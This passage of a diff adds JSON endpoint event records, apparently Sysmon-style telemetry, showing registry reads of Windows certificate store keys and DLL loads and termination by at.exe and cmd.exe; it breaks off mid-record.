"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "at.exe", + "image_path": "C:\\Windows\\System32\\at.exe", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "schedcli.dll", + "image_path": "C:\\Windows\\System32\\schedcli.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803860000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803860000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "process", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "subtype": "terminate", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "process", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 